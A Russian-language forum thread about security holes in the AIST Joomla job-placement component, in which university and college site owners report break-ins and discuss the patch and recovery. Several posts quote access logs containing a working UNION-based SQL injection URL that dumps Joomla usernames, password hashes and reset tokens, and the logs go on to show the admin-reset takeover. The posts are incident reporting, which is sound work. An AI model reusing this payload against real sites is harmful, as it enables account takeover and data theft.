Новости:

Автор Тема: Проблемы безопасности  (Прочитано 26020 раз)

0 Пользователей и 1 Гость просматривают эту тему.

Оффлайн vsu

  • Новичок
  • *
  • Сообщений: 11
Проблемы безопасности
« : 04.06.2010, 18:21:17 »
Прежде чем устанавливать AIST_1.1.0, просмотрел код на предмет наличия типичных ошибок — как выяснилось, не зря.

1) В большинстве скриптов, работающих с базой данных, есть возможность SQL Injection. Для вызываемых напрямую файлов */backend.php некоторую защиту от этого даёт включение magic_quotes_gpc в настройках PHP, но в коде, получающем значения параметров через JRequest::getVar, нужно явно использовать $db->Quote(...) при формировании SQL-запроса. Да и в коде, работающем с параметрами напрямую, лучше не рассчитывать на использование magic_quotes_gpc.

2) В front/views/useroffice/tmpl/backend.php, помимо обычного SQL Injection при отключении magic_quotes_gpc, ещё есть проблема, проявляющаяся при включении по каким-либо причинам register_globals (переменная $sql при некоторых значениях параметров запроса не инициализируется).

3) При формировании содержимого страниц из шаблонов front/views/*/tmpl/default.php не используется метод $this->escape(...) для экранирования спецсимволов HTML, в результате имеется возможность отображения на сайте произвольного HTML-кода (в том числе содержащего JavaScript — т.е., уязвимость вида Cross Site Scripting).

Использование на сайте ВУЗа системы с подобными проблемами безопасности, на мой взгляд, недопустимо — необходимо устранить эти уязвимости.
« Последнее редактирование: 10.05.2011, 11:08:01 от Лисичкин Сергей »

santahaka

  • Гость
Re:Проблемы безопасности
« Ответ #1 : 02.05.2011, 15:34:17 »
Через ваш чудо компонент был произведён эксплойт (SQL-инъекция) сброс пароля администратора

логи

GET /index.php?option=com_aist&view=vacancylist&contact_id=-3+AND+1%3D2+UNION+SELECT+1%2C2%2C3%2C4%2Cgroup_concat%28username%2Cpassword%2C0x3a%29%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28%2C29%2C30%2C31%2C32%2C33%2C34%2C35%2C36+from+jos_users--

http://sait.ru/index.php?option=com_aist&view=vacancylist&contact_id=-3+AND+1%3D2+UNION+SELECT+1%2C2%2C3%2C4%2Cgroup_concat%28username%2Cpassword%2C0x3a%29%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28%2C29%2C30%2C31%2C32%2C33%2C34%2C35%2C36+from+jos_users--

http://sait.ru/index.php?option=com_aist&view=vacancylist&contact_id=-3+AND+1%3D2+UNION+SELECT+1%2C2%2C3%2C4%2Cgroup_concat%28username%2Cpassword%2C0x3a%29%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28%2C29%2C30%2C31%2C32%2C33%2C34%2C35%2C36+from+jos_users--

GET /index.php/component/user/reset HTTP/1.1" 200 17780 "http://sait.ru/index.php?option=com_aist&view=vacancylist&contact_id=-3+AND+1%3D2+UNION+SELECT+1%2C2%2C3%2C4%2Cgroup_concat%28username%2Cpassword%2C0x3a%29%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28%2C29%2C30%2C31%2C32%2C33%2C34%2C35%2C36+from+jos_users--

Akul

  • Гость
Re:Проблемы безопасности
« Ответ #2 : 03.05.2011, 16:08:45 »
И от меня СПАСИБО :o ??? СПАСИБО :o ??? СПАСИБО :o ???

2.90.211.139 - - [02/May/2011:16:49:07 +0600] "GET /aist/index.php?option=com_aist&view=vacancylist&contact_id=-3+AND+1%3D2+UNION+SELECT+1%2C2%2C3%2C4%2Cgroup_concat%28username%2C0x3a%2Cactivation%29g3mb3lzfeatnuxbie%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28%2C29%2C30%2C31%2C32%2C33%2C34%2C35%2C36+from+jos_users-- HTTP/1.1" 200 14271
3D2+UNION+SELECT+1%2C2%2C3%2C4%2Cgroup_concat(username%2C0x3a%2Cemail)g3mb3lzfeatnuxbie%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28%2C29%2C30%2C31%2C32%2C33%2C34%2C35%2C36+from+jos_users-- HTTP/1.1" 200 14114
2.90.211.139 - - [02/May/2011:16:49:36 +0600] "GET /aist/index.php?option=com_user&view=reset HTTP/1.1" 200 9895
2.90.211.139 - - [02/May/2011:16:49:37 +0600] "GET /aist/media/system/js/validate.js HTTP/1.1" 200 4246
2.90.211.139 - - [02/May/2011:16:49:37 +0600] "GET /aist/media/system/js/mootools.js HTTP/1.1" 200 74404
2.90.211.139 - - [02/May/2011:16:49:42 +0600] "POST /aist/index.php?option=com_user&task=requestreset HTTP/1.1" 301 -
2.90.211.139 - - [02/May/2011:16:49:44 +0600] "GET /aist/index.php?option=com_user&view=reset&layout=confirm HTTP/1.1" 200 10255
2.90.211.139 - - [02/May/2011:16:49:44 +0600] "GET /aist/templates/system/images/notice-note.png HTTP/1.1" 200 1335
2.90.211.139 - - [02/May/2011:16:49:57 +0600] "GET /aist/index.php?option=com_aist&view=vacancylist&contact_id=-3+AND+1%3D2+UNION+SELECT+1%2C2%2C3%2C4%2Cgroup_concat%28username%2C0x3a%2Cactivation%29g3mb3lzfeatnuxbie%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28%2C29%2C30%2C31%2C32%2C33%2C34%2C35%2C36+from+jos_users-- HTTP/1.1" 200 14303
2.90.211.139 - - [02/May/2011:16:50:07 +0600] "GET /aist/index.php?option=com_user&view=reset&layout=confirm HTTP/1.1" 200 10020
2.90.211.139 - - [02/May/2011:16:50:16 +0600] "POST /aist/index.php?option=com_user&task=confirmreset HTTP/1.1" 301 -
2.90.211.139 - - [02/May/2011:16:50:16 +0600] "GET /aist/templates/system/images/selector-arrow.png HTTP/1.1" 200 299
2.90.211.139 - - [02/May/2011:16:50:16 +0600] "GET /aist/index.php?option=com_user&view=reset&layout=complete HTTP/1.1" 200 10093
2.90.211.139 - - [02/May/2011:16:50:27 +0600] "POST /aist/index.php?option=com_user&task=completereset HTTP/1.1" 301 -
2.90.211.139 - - [02/May/2011:16:50:27 +0600] "GET /aist/index.php?option=com_user&view=login HTTP/1.1" 200 10261
2.90.211.139 - - [02/May/2011:16:50:28 +0600] "GET /aist/templates/system/images/notice-info.png HTTP/1.1" 200 1010
2.90.211.139 - - [02/May/2011:16:50:31 +0600] "GET /aist/images/stories/key.jpg HTTP/1.1" 200 2665
2.90.211.139 - - [02/May/2011:16:50:38 +0600] "GET /aist/administrator HTTP/1.1" 301 251
2.90.211.139 - - [02/May/2011:16:50:38 +0600] "GET /aist/administrator/ HTTP/1.1" 200 4670
2.90.211.139 - - [02/May/2011:16:50:39 +0600] "GET /aist/administrator/templates/khepri/css/rounded.css HTTP/1.1" 200 2495
2.90.211.139 - - [02/May/2011:16:50:39 +0600] "GET /aist/administrator/templates/khepri/css/login.css HTTP/1.1" 200 1954

Снес это ГГГГГГГ.... к ....матери

Сочуствую коллегам по несчастью.


Akul

  • Гость
Re:Проблемы безопасности
« Ответ #3 : 03.05.2011, 16:25:14 »
Кстати, вот еще один пострадавший http://kcst.bmstu.ru/forums/index.php/topic,843.msg3307.html#msg3307.

Но ведь бен Ладен живой еще был. За что страдаем?

admin

  • Гость
Re:Проблемы безопасности
« Ответ #4 : 04.05.2011, 13:53:52 »
Исправленный компонент выложен

как обновиться:
1. установить компонент АИСТ поверх имеющегося
или
2. все папки и файлы из папки front дистрибутива АИСТ (<папка архива>\AIST_1.1\front) скопировать с заменой в <корневая папка Joomla>\components\com_aist

Скачивать ОТСЮДА
« Последнее редактирование: 05.05.2011, 09:17:54 от Лисичкин Сергей »

santahaka

  • Гость
Re:Проблемы безопасности
« Ответ #5 : 04.05.2011, 23:54:38 »
Исправленный компонент выложен

как обновиться:
1. установить компонент АИСТ поверх имеющегося
или
2. все папки и файлы из папки front дистрибутива АИСТ (<папка архива>\AIST_1.1\front) скопировать с заменой в <корневая папка Joomla>\components\com_aist

Где он выложен? по ссылки http://aist.bmstu.ru/index.php?option=com_downloads&redirect=1 старая версия "1.1   Май 2010"


santahaka

  • Гость
Re:Проблемы безопасности
« Ответ #6 : 04.05.2011, 23:57:41 »
Смотрю статистику, на сайт уже переходят по ключевым словам : com_aist, inurl:"com_aist"

ребята которые любят взламывать сайты просекли косячный компонент, вот уже и ищут сайты где есть aist.

santahaka

  • Гость
Re:Проблемы безопасности
« Ответ #7 : 05.05.2011, 00:13:00 »
Администраторы, создатели этого компонента, объясните нам как защитить наши сайты от взлома??? Сайт вуза, это не 2, не 10 и не 50 страничек, его долго и усердно создавали люди. И поставив ваш "чудо компонент" сайт легко поддается взлому.

santahaka

  • Гость
Re:Проблемы безопасности
« Ответ #8 : 05.05.2011, 00:21:28 »
вот опять

"GET /index.php?option=com_aist&view=vacancylist&contact_id=-3+AND+1%3D2+UNION+SELECT+1%2C2%2C3%2C4%2Cgroup_concat%28username%2Cpassword%2C0x3a%29%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28%2C29%2C30%2C31%2C32%2C33%2C34%2C35%2C36+from+jos_users-- HTTP/1.1" 200 21690 "-" "Mozilla/5.0 (Windows NT 6.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1"

kpk-kurgan

  • Гость
Re:Проблемы безопасности
« Ответ #9 : 05.05.2011, 08:58:55 »
У нас взломан Ваш АИСТ, слава богу, что он стоял рядом с сайтом, а не на нем. Есть рекомендации как его восстановить или ставить все опять?

dronga

  • Гость
Re:Проблемы безопасности
« Ответ #10 : 05.05.2011, 12:05:13 »
Отвечу. АИСТ не имеет никаких штатных средств резервного копирования, поэтому если у вас есть копия/бекап, то используйте их.

Вопрос к создателям системы - Что вы можете сказать о безопасности и целесообразности дальнейшего использования АИСТ??

Оффлайн Лисичкин Сергей

  • Администратор
  • Ветеран
  • *****
  • Сообщений: 573
  • Не-разработчик АИСТ :)
Re:Проблемы безопасности
« Ответ #11 : 05.05.2011, 12:18:37 »
Охотник на троллей

dronga

  • Гость
Re:Проблемы безопасности
« Ответ #12 : 05.05.2011, 12:22:14 »
http://aist.bmstu.ru/index.php?&option=com_aist&view=vacancylist&contact_id=-3%20AND%201=2%20UNION%20SELECT%201,2,3,4,group_concat%28username,0x3a,activation%29g3mb3lzfeatnuxbie,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36%20from%20jos_users--&Itemid=

позор

http://hghltd.yandex.net/yandbtm?fmode=inject&url=http%3A%2F%2Fjob.sibsiu.ru%2Findex.php%3Foption%3Dcom_aist%26view%3Ddocs%26documentid%3D4&text=com_aist&l10n=ru&sign=c76509d87aaecbfcdbfe80c457c98b99&keyno=0

позор2

http://www.exploit-id.com/web-applications/joomla-component-com_aist-sql-injection-vulnerability

позор 3. Эксплоит в паблике с 28 апреля. Реагирование - 4 мая. Сколько эксплоит в статусе 0day - неизвестно. С какой версии компонент уязвим??
« Последнее редактирование: 05.05.2011, 12:35:44 от dronga »

kpk-kurgan

  • Гость
Re:Проблемы безопасности
« Ответ #13 : 05.05.2011, 12:37:45 »
Цитировать
вчера обновили версию http://kcst.bmstu.ru/forums/index.php/topic,471.msg3361.html#msg3361
Это значит ставить заново? Если Вам икается, знайте - это я Вас всех вспоминаю!

dronga

  • Гость
Re:Проблемы безопасности
« Ответ #14 : 05.05.2011, 12:50:03 »
Если нет доверенного бекапа - значит ставить заново. У меня получив пароль администратора злоумышленники установили в нашу джумлу компонент NinjaExplorer (позволяет проводить браузинг и другие операции на файловой системе). Залили шелл и модифицировали несколько файлов (сервер, естественно, не выделенный). Базу данных также можно считать скомпрометированной/утраченной.

Вопрос. Какие будут рекомендации по юридическому преследованию??

kpk-kurgan

  • Гость
Re:Проблемы безопасности
« Ответ #15 : 05.05.2011, 12:50:58 »
Всем кто смог восстановить доступ к администрированию Joomla!!! Кто знает как удалить вредоносный код, помогите, буду очень признательна. Очень не хочется начинать все с нуля. Как и у всех Вас других дел хватает.  >:(

tuut

  • Гость
Re:Проблемы безопасности
« Ответ #16 : 10.05.2011, 06:48:28 »
У нас тоже взломали
aist.univer.omsk.su

это я просто для статистики

tuut

  • Гость
Re:Проблемы безопасности
« Ответ #17 : 10.05.2011, 07:06:50 »
Почему я не могу скачать обновленную версию?
Он мне говорит:

Warning: require_once(D:/WWW/aist.bmstu.ru/9aa2cc745466b743914b6a83df9fb2cb/sape.php) [function.require-once]: failed to open stream: No such file or directory in D:\WWW\aist.bmstu.ru\templates\orist\index.php on line 17

ХГУ

  • Гость
Re:Проблемы безопасности
« Ответ #18 : 10.05.2011, 07:09:53 »
http://aist.bmstu.ru - тоже не работает 10.05.2011 в 8:06 по МСК ;) у них интересно какие проблемы?
« Последнее редактирование: 10.05.2011, 07:13:52 от ХГУ »

allexk

  • Гость
Re:Проблемы безопасности
« Ответ #19 : 10.05.2011, 08:35:32 »
http://aist.bmstu.ru - тоже не работает 10.05.2011 в 8:06 по МСК ;) у них интересно какие проблемы?
Работает

tuut

  • Гость
Re:Проблемы безопасности
« Ответ #20 : 10.05.2011, 08:41:55 »
Удалось скачать, спасибо.
А не подскажете как восстановить администраторский пароль  для джумла? А то в админку то я попасть не могу теперь :(

admin

  • Гость
Re:Проблемы безопасности
« Ответ #21 : 10.05.2011, 08:45:12 »
А не подскажете как восстановить администраторский пароль  для джумла?

Содержимое поля password из бэкапа заменить для нужной учетки.

tuut

  • Гость
Re:Проблемы безопасности
« Ответ #22 : 10.05.2011, 09:06:06 »
А не подскажете как восстановить администраторский пароль  для джумла?

Содержимое поля password из бэкапа заменить для нужной учетки.

Какая загадочная фраза  :o
А можно чуть подробнее,где находится поле password, например?

admin

  • Гость
Re:Проблемы безопасности
« Ответ #23 : 10.05.2011, 09:37:12 »
Какая загадочная фраза  :o
А можно чуть подробнее,где находится поле password, например?

Таблица jos_users в БД, в ней поле password, значение поля из бэкапа нужно подставить. Или зарегистрировать нового пользователя с нужным паролем и скопировать его поле password в password админа, а пользователя удалить.

tuut

  • Гость
Re:Проблемы безопасности
« Ответ #24 : 10.05.2011, 12:00:37 »
Спасибо :).
В общем я все переустановила в результате.

miha

  • Гость
Re:Проблемы безопасности
« Ответ #25 : 10.05.2011, 13:39:40 »
Ломанули аналогично, через сброс пароля.  >:( Снес нах это решето под названием АИСТ, и духу его больше не будет на сайте !!! Новый компонент не буду ставить по одной простой причине, проверять нет времени, а расчитывать на совесть разрабов как сами понимаете не приходиться. Сочувствую тем людям у которых не оказалось свеженького бэкапа под рукой и из за этого "дырявого" говно-компонента труды многих недель а то и месяцев на смарку пошли... Разрабы ауууу ! Вы хоть бы извинились чтоль >:(     

Novozar

  • Гость
Re:Проблемы безопасности
« Ответ #26 : 11.05.2011, 11:26:13 »
Нам кто-то на сайт записал трояны и взломал сайт повесив террористические лозунги, подозреваем, что благодаря тому что был открыт доступ на запись (хакер по имени HaCKeD By SOSICK K.S.A - посмотрите в Google сколько сайтов он испоганил).  

Аналогичная ситуация, сайт взломали,  гадостей на стартовой написали, тот же хакер.
Есть подозрения что взломали через систему восстановления пароля, так как в день взлома пришло письмо системы восстановления пароля, с просьбой активировать новый пароль.

Novozar

  • Гость
Re:Проблемы безопасности
« Ответ #27 : 11.05.2011, 11:47:52 »
Ломанули аналогично, через сброс пароля.  >:( Снес нах это решето под названием АИСТ, и духу его больше не будет на сайте !!! Новый компонент не буду ставить по одной простой причине, проверять нет времени, а расчитывать на совесть разрабов как сами понимаете не приходиться. Сочувствую тем людям у которых не оказалось свеженького бэкапа под рукой и из за этого "дырявого" говно-компонента труды многих недель а то и месяцев на смарку пошли... Разрабы ауууу ! Вы хоть бы извинились чтоль >:(     

Один в один, тоже взломали через восстановление, сброс пароля. Снес АИСТ, только оставил ссылку на центральный сервер.
Всё это очень загадочно и не понятно, почему не был написан нормальный движек с нуля, почему реализация системы сделана модулями на общедоступном движке который хакают все кому не лень.
Мне жаль человека который у нас занимался наполнением АИСТа, собирал анкеты, общался со студентами, заводил записи. Теперь повторную работу она точно делать не будет.

vbmk

  • Гость
Re:Проблемы безопасности
« Ответ #28 : 11.05.2011, 19:54:50 »
И пусть мне только позвонит чел с депратамента образования с требованием внедрения аиста........, буду негодовать >:(
Тоже пострадал от хакеров, сначала просто написали текст "hakered by 747 crew", после решил восстановить страничку аиста, после нескольких часов группа хакеров повесила флаг Косово.Удалил директорию administrator, теперь всё путём.

P/S/ Заморачиваться с этим аистом больше не буду.
« Последнее редактирование: 11.05.2011, 19:57:37 от vbmk »

aistxost

  • Гость
Re:Проблемы безопасности
« Ответ #29 : 12.05.2011, 08:16:27 »
А еще было бы не плохо выпустить версию без триггеров, на некоторых хостингах такова поддерэжка отсутствует. Вот и сидим ждем, и от начальства получаем ...

allexk

  • Гость
Re:Проблемы безопасности
« Ответ #30 : 12.05.2011, 08:25:26 »
А еще было бы не плохо выпустить версию без триггеров, на некоторых хостингах такова поддерэжка отсутствует. Вот и сидим ждем, и от начальства получаем ...
Работаем над этим

aistxost

  • Гость
Re:Проблемы безопасности
« Ответ #31 : 12.05.2011, 10:11:18 »
Это хорошо, будем ждать.
А остальным, - может хватить брызгать слюной? Админов пинают так же как и нас. Недочеты может допускать каждый. Но кто-то в большей степени, а кто-то в меньшей. Мне вот например хватило ума держать аист отдельно от сайта. Да и бэкапы регулярно проводятся. Вы же itшники, должны быть готовы ко всему.

kpk-kurgan

  • Гость
Re:Проблемы безопасности
« Ответ #32 : 12.05.2011, 12:37:28 »
Рада за Вас, у Вас есть IT-шники, а у нас на зарплату в 3,5 тысячи никто не идет, вот и приходится учителю информатики этой бедой заниматься, а у меня кроме всего прочего еще и 34 часа в неделю уроков + разработка ОПОП по ФГОС и куча других проблем.
А если система дырявая, так нужно сразу предупреждать, они ведь советовали на сайт ставить, если он на Joomle. Вот народ и поверил в сказку.

efrmaxim

  • Гость
Re:Проблемы безопасности
« Ответ #33 : 13.05.2011, 08:39:21 »
ОГРОМНОЕ СПАСИБО И ОТ МЕНЯ.........www.spoemk.ru.
Я сначала сидел рыскал, искал что где, ручками выправлял ваш компонент, но узнав про обновление, которое ничего не сохраняет, смело все удаляю к чертям.
Остается вопрос очень сильно тревожащий, а именно - я бегал, носился по городу, уговаривал работодателей зайти на сайт и разместить свои вакансии, потому что это якобы быстрее и надежнее, общая база и тому подобное. вырезано И что я должен опять бегать и грешить на аппаратные сбои, вихревые токи в верхних слоях атмосферы и сломанный бубен ?
« Последнее редактирование: 20.05.2011, 11:25:36 от Лисичкин Сергей »

Оффлайн Лисичкин Сергей

  • Администратор
  • Ветеран
  • *****
  • Сообщений: 573
  • Не-разработчик АИСТ :)
Re:Проблемы безопасности
« Ответ #34 : 13.05.2011, 09:05:10 »
но узнав про обновление, которое ничего не сохраняет,

 А теперь при обновлении компонента, все .....

Что у вас при обновлении исчезло или перестало сохраняться?
Охотник на троллей

efrmaxim

  • Гость
Re:Проблемы безопасности
« Ответ #35 : 13.05.2011, 09:24:35 »
Цитировать
Что у вас при обновлении исчезло или перестало сохраняться?
У меня появляется смутное чувство собственного дибилизма, может пятница, может пятница 13, не знаю....
Большими красными буквами написано [url http://aist.bmstu.ru/index.php?option=com_downloads&redirect=1] Тут[/url]
Цитировать
Внимание!!! При обновлении версии 1.0 на версию 1.1,

в связи со значительными изменениями структуры таблиц базы данных, информация о контактах, вакансиях и резюме, хранящаяся в старой версии будет уничтожена при переустановке. При необходимости, создайте резервную копию таблиц в базе данных.

Так вот вопрос возникает : если призначительном изменении структуры таблиц данные потруться, то какой смысл делать резервную копию с данными записанными в таблицах, у которых структура другая ? или мне открыть MySQL и ручками править старую структуру под новую и смотреть как что и куда изменилось ? Или мне сделать бакап в виде распечаток на бумажке, с которой потом заного вносить данные в базу с новой структурой ?

всё таки как хорошо, что джумла с аистом лежит отдельно от движка сайта....

Оффлайн Лисичкин Сергей

  • Администратор
  • Ветеран
  • *****
  • Сообщений: 573
  • Не-разработчик АИСТ :)
Re:Проблемы безопасности
« Ответ #36 : 13.05.2011, 09:42:54 »
скорей всего это не дибилизм, а незнание или невнимательность. версия 1.0 была в марте 2010, с мая 2010 используется новая версия структуры БД - 1.1.x.  любое обновление версии 1.1 работает по принципу совместимости и не затрагивает БД. А сделать бекап никогда не будет лишним.
Охотник на троллей

aistxost

  • Гость
Re:Проблемы безопасности
« Ответ #37 : 13.05.2011, 14:21:25 »
Читайте, и еще раз читайте господа, техническая литература одухотворяет и помогает избавиться от 60% вопросов. Ну а все остальное можно списать на сообразительность и опыт за плечами. Сам порой по мелочам устраиваю панику.

А по поводу держать аист от сайта подальше вполне здравое и логичное решение. Не хотите платить за это деньги? Легко. Сейчас создам темку про это.

efrmaxim

  • Гость
Re:Проблемы безопасности
« Ответ #38 : 17.05.2011, 08:48:17 »
так, поздравьте меня, после бурных выходных, с ноющей спиной от огорода, я все-таки переставил аист, переписал пользователей, ток вот что-то синхронизация не получается с центральным узлом.

user12265

  • Гость
Re:Проблемы безопасности
« Ответ #39 : 19.05.2011, 10:56:15 »
Добрый день. Наш сайт http://www.medicroslavl.ru/ (АИСТ) был взломан и заблокирован. Просим Вас оказать консультативную помощь в сложившейся ситуации. Заранее благодарны.